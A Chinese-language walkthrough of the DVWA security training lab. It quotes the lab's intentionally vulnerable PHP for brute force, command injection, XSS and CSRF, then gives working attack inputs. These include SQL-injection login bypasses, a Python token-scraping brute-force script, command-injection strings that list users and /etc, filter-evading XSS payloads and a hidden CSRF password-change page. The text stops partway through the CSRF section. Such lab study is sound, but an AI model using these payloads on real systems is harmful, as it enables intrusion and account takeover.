DVWA

今天发一下硬盘格式化抢救回来的对于DVWA靶场的渗透记录，基本是可以作为web安全入门的参考资料了，大家一起分享~

Bruteforce

Low

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];

    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

发现对Login和pass参数未进行任何严格的检查与过滤，也没有设置防爆破机制

因为可以通过sql注入和爆破来进行强制登录

先利用Sql注入进行登录

admin' or '1'='1
admin' #

第一种情况将验证语句篡改为了user=’admin’ or ‘1’=’1’ and password = ‘$pass’;,因此不管密码为什么，整个语句的值恒为True，与下图原理类似

第二种直接将后面的and password = ‘$pass’;注释掉了，user=admin为True，因此表达式为True

爆破密码进行登录

抓包得到数据，右键send to the Intruder（爆破板块）

设置password 的值为爆破点，payload里加载密码字典

（这里要说明一下，爆破的原理还是穷举法，因此要不断积累自己的字典，理论上来讲，只要字典足够大，密码一定会被破开；同样，密码强度如果足够强，可以很大程度的保证自己的密码不被爆破破解）

加载字典完成后可以在option里更改爆破进程数

以上工作做好后点击Start attack 开始爆破

密码爆破的特征是正确密码的返回长度与错误密码不一样，这里很容易发现password为正确密码

验证成功，密码为password

Medium

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

很明显发现多了mysqli_real_escape_string这个函数，让我们来看一下这个函数的作用

也就是说将我们sql注入中的许多常用字符都给过滤掉了，这样基本杜绝了sql注入（相信一切输入都是有害的）

但是我们发现代码并没有加上严格的防爆破机制，因为爆破密码仍然有效，爆破方法与刚才相同，不再赘述。

High

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

我们发现在high等级的防护上加入了CSRF-token机制

CSRF-token机制：在访问页面时，服务器会在给本地浏览器一个token随机数，用户输入账号密码点击提交时，token会与user与password一同在服务器端进行验证，如果token不对，直接拒绝服务

因为每次的token是不同的，因为理论上这样似乎是能够防御爆破的，但是实际上，如果我们能够获取到在每次登陆界面的token值，我们就仍然可以进行爆破

我们观察发现，在login.php界面，token被放在了这样一个form表单里

token值的前面是 value=‘

token值的后面是 ' /></form>

我们可以通过burpsuite的正则过滤来匹配这个特征，从而得到token值，下面进行操作

首先，抓包并send to Intruder

更改Attack type为Pitchfork，并标记password和user_token为两个爆破点

（Pitchfork：草叉模式，对不同参数设置不用的payload）

在option里，更改线程为1（Pitchfork不支持多线程爆破),点击Grep-Extract的Add，添加我们要匹配的模式

点击OK后，将option页面最下面的Redirections改为Always（保证每次使用的user_token为最新的）

在Payloads页面中设置两个爆破点的payload

注意参数2的payload type 为Recursive grep

上述操作全部完成后，Start attack

因为为单线程，所以速度可能有点慢

爆破成功，得到密码为password

High 除了通过burpsuite抓token，使用python也可以，主要利用requests和正则表达式，附代码

import requests
import re
#登录获取cookie
sess=requests.session()
url='http://192.168.1.128/dvwa/login.php'
text=sess.get(url).text
pattern=re.compile(r'user_token\' value=\'.*\' />')
token=''.join(pattern.findall(text))
token=token.replace('user_token\' value=\'','')
token=token.replace('\' />','')
data={
    'username':'admin',
    'password':'password',
    'Login':'Login',
    'user_token':token
    }
result=sess.post('http://192.168.1.128/dvwa/login.php',data)
print("登陆成功")

#更改安全性为高
text=sess.get('http://192.168.1.128/dvwa/security.php').text
pattern=re.compile(r'user_token\' value=\'.*\' />')
token=''.join(pattern.findall(text))
token=token.replace('user_token\' value=\'','')
token=token.replace('\' />','')
data={
'security':'high',
'seclev_submit':'Submit',
'user_token':token
    }
result=sess.post('http://192.168.1.128/dvwa/security.php',data)
print('安全性更改为高')

#获取token
text=sess.get('http://192.168.1.128/dvwa/vulnerabilities/brute/').text
pattern=re.compile(r'user_token\' value=\'.*\' />')
token=''.join(pattern.findall(text))
token=token.replace('user_token\' value=\'','')
token=token.replace('\' />','')


#爆破密码
with open('G:\网络安全\资源\猪猪侠字典\Blasting_dictionary\常用密码.txt','r',encoding='utf-8') as f:
    while True:
        password=f.readline().replace('\n','')
        print(password,token)
        text=sess.get('http://192.168.1.128/dvwa/vulnerabilities/brute/index.php?username=admin&password='+password+'&Login=Login&user_token='+token).text
        if 'Welcome' in text:
            print("password found:",end='')
            print(password)
            break
        pattern=re.compile(r'user_token\' value=\'.*\' />')
        token=''.join(pattern.findall(text))
        token=token.replace('user_token\' value=\'','')
        token=token.replace('\' />','')

Impossible

<?php

if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";

        // Calculate when the user would be allowed to login again
        $last_login = strtotime( $row[ 'last_login' ] );
        $timeout    = $last_login + ($lockout_time * 60);
        $timenow    = time();

        /*
        print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
        print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
        print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
        */

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow < $timeout ) {
            $account_locked = true;
            // print "The account is locked<br />";
        }
    }

    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
        echo "<img src=\"{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
            echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    } else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

在impossible级别里加入了防爆破机制，如果短时间内错误次数过多，将锁定账户，直接了当的解决了爆破问题

Command Injection

Low

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

审计代码发现，ip参数没有经过任何过滤，可以通过&来进行多命令注入

127.0.0.1&&net user（windows与linux）
127.0.0.1;ls /etc/
还有很多可以造成危害的操作，就不一一列举了

Medium

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

可以看到中级过滤掉了一次&&和；但是&并没有过滤，同样我们可以通过&；&来构造多命令注入

A&&B:A执行成功后执行B，否则不执行B；

A&B:先执行A后执行B，不管执行成功与否；

127.0.0.1&ifconfig
127.0.0.1&;&ifconfig

High

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $target = trim($_REQUEST[ 'ip' ]); 

    // Set blacklist 
    $substitutions = array( 
        '&'  => '', 
        ';'  => '', 
        '| ' => '', 
        '-'  => '', 
        '$'  => '', 
        '('  => '', 
        ')'  => '', 
        '`'  => '', 
        '||' => '', 
    ); 

    // Remove any of the charactars in the array (blacklist). 
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); 

    // Determine OS and execute the ping command. 
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 
        // Windows 
        $cmd = shell_exec( 'ping  ' . $target ); 
    } 
    else { 
        // *nix 
        $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
    } 

    // Feedback for the end user 
    echo "<pre>{$cmd}</pre>"; 
} 

?>

这次过滤了更多的参数，但我们发现过滤的是’| ‘而不是’|’,因此可以通过|来构造多命令注入

A|B:管道符，将A的输出作为B的输入，并且只打印B的结果。

127.0.0.1/ls /etc

Impossible

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $target = $_REQUEST[ 'ip' ]; 
    $target = stripslashes( $target ); 

    // Split the IP into 4 octects 
    $octet = explode( ".", $target ); 

    // Check IF each octet is an integer 
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) { 
        // If all 4 octets are int's put the IP back together. 
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3]; 

        // Determine OS and execute the ping command. 
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 
            // Windows 
            $cmd = shell_exec( 'ping  ' . $target ); 
        } 
        else { 
            // *nix 
            $cmd = shell_exec( 'ping  -c 4 ' . $target ); 
        } 

        // Feedback for the end user 
        echo "<pre>{$cmd}</pre>"; 
    } 
    else { 
        // Ops. Let the user name theres a mistake 
        echo '<pre>ERROR: You have entered an invalid IP.</pre>'; 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

严格限制为输入类型为 number.number.number.number

无法执行命令注入

XSS

Reflect

Low

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

对输入没有任何过滤，可以直接注入

<script>alert(1)</script>

Medium

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

meidum利用str_replace进行替换，但可以双写或者大小写绕过

<scr<script>ipt>alert(1)</script>
<Script>alert(1)</script>

High

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

经过正则过滤，多少<script>都会被过滤掉，但可以利用标签属性来

<img src=1 onerror=alert(1)>

Impossible

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Impossible使用htmlspecialchars函数把预定义的字符&、”、 ’、<、>转换为HTML，无法执行xss

Stored

Low

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

长度有限制，但可以抓包修改

<script>alert(2)</script>

Medium

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

只是单纯的过滤了<script>,可以通过双写和大小写绕过

<scr<script>ipt>alert(1)</script>
<Script>alert(2)</script>

High

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

正则过滤<script>，多少个都没有用，但是可以通过其他标签进行注入

<img src=1 onerror=alert(1)>

Impossible

<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

对特殊符号进行了html转义，基本无法进行注入

DOM

Low

<?php

# No protections, anything goes

?>

没有经过任何过滤，可以直接注入

127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>

Medium

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?

过滤了<script>,但我们可以借助其他标签

127.0.0.1/dvwa/vulnerabilities/xss_d/?default= ></option></select><img src=1 onerror=alert(1)>

High

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

只能从三种语言选一种，暂时不太好注入

Impossible

<?php

# Don't need to do anything, protction handled on the client side

?>

CSRF

Low

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
} 

?>

代码审计可以发现，没有任何防csrf的机制，

http://localhost/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

在服务器端身份验证信息（cookie）未过期时，可以通过CSRF漏洞来更改登录密码，

方法一：直接点击上述网址，密码更改成功，但URL参数会暴露密码被修改，用户容易发现密码被篡改

方法二：对构造的URL进行百度短链接操作，达到一定的隐藏效果（注意需要域名才能伪造，ip链接无法伪造）

方法三：自行构造攻击界面

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=hello&password_conf=hello&Change=Change#" style="display:none;">
    <h1>404</h1>
    <p>链接不存在</p>
</body>
</html>

Medium

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Checks to see where the request came from 
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { 
        // Get input 
        $pass_new  = $_GET[ 'password_new' ]; 
        $pass_conf = $_GET[ 'password_conf' ]; 

        // Do the passwords match? 
        if( $pass_new == $pass_conf ) { 
            // They do! 
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
            $pass_new = md5( $pass_new ); 

            // Update the database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Issue with passwords matching 
            echo "<pre>Passwords did not match.</pre>"; 
        } 
    } 
    else { 
        // Didn't come from a trusted source 
        echo "<pre>That request didn't look correct.</pre>"; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
} 

?>

medium级别加入了验证

stripos（string a,string b)：查询a字符串中是否有b,有则返回位置，没有返回false

中级过滤检查HTTP_REFERER (referer)是否含有SERVER_NAME（host)

此处可以将攻击界面命名为ip(host对应).html，将攻击界面一台服务器上，这样referer中就会含有host的ip

此时我们的Referer中确实含有host的ip地址，所以攻击成功，密码为改为hello

High

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 

